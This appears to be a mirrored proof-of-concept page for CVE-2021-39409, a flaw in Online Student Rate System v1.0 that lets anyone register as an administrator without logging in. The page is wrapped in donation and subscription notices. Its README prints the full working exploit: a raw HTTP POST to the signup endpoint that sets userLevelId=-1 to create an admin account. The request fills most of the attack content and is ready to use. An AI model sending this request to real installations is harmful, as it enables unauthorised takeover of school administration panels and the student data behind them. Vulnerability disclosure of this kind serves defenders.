Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-39409 PoC — Online Student Rate System 安全漏洞

Source
https://github.com/StefanDorresteijn/CVE-2021-39409
Associated Vulnerability
Title:Online Student Rate System 安全漏洞 (CVE-2021-39409)
Description:A vulnerability exists in Online Student Rate System v1.0 that allows any user to register as an administrator without needing to be authenticated.
Description
Admin account registration in Online Student Rate System
Readme
# CVE-2021-39409
Admin account registration is possible in Online Student Rate System v1.0, allowing a malicious actor to create an admin account and access the admin panel.

## Vulnerability
```
POST /ajax.php?action=signup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Origin: http://localhost
Connection: close
Referer: http://localhost

username=testaccount&passsword=098f6bcd4621d373cade4e832627b4f6&userLevelId=-1&email=example@example.com
```
File Snapshot

 [4.0K]  /data/pocs/b80b82be82a4a1f58d7c4fc6368efff45d459a81
└── [ 702]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →